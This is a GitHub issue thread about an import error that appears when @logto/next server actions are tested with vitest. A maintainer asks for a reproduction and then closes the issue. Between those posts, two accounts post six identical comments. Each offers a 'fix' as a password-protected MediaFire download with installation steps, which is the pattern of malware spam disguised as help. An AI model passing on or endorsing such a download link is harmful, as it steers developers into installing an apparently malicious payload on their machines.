### ISSUE TITLE
bug: Import issue when in test environment using vitest

### ISSUE THREAD

**Issue by potikhanovsergey** [logto-io/js#789]
### Describe the bug
```
Error: Cannot find module '/node_modules/next/navigation' imported from /node_modules/@logto/next/lib/server-actions/index.js
Did you mean to import next/navigation.js?
```

Similar closed issue from the other library: https://github.com/refinedev/refine/issues/5846

### How to reproduce?
1) import { getLogtoContext } from "@logto/next/server-actions"; in the server component
2) render the component using vitest

### Context

- [ ] Logto Cloud
- [+ ] Self-hosted, Logto version = 3.6.0
  - [ ] Container (Docker image)
  - [+ ] Raw Node.js

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by wangsijie** [comment]
Hi, @potikhanovsergey could you please provide a minimal repo that reproduce this issue? So that I can verify it.

**Comment by wangsijie** [comment]
I am closing this now, feel free to reopen if you have any updates @potikhanovsergey
